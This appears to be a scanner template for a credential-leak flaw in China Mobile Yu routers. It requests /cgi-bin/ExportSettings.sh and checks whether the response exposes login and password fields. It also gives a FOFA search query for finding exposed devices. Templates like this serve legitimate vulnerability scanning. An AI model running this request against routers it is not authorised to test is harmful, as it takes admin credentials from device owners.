id: china-mobile-export-settings-info-leak

info:
  name: 中移禹路由器 信息泄露漏洞
  author: zan8in
  severity: high
  verified: true
  description: |
    中移禹路由器ExportSettings处存在信息泄露漏洞，攻击者可以获取后台权限。
    fofa：title="互联世界 物联未来-登录"
  reference:
    - https://mp.weixin.qq.com/s/HgwGxIiIj4XrvNS_AvoruA
  created: 2023/05/26

rules:
  r0:
    request:
      method: GET
      path: /cgi-bin/ExportSettings.sh
    expression: |
      response.status == 200 && 
      response.body.bcontains(b"'Login'=") &&
      response.body.bcontains(b"'Password'=") &&
      response.body.bcontains(b"'HostName'=") &&
      response.body.bcontains(b"'WebInit'=")
expression: r0()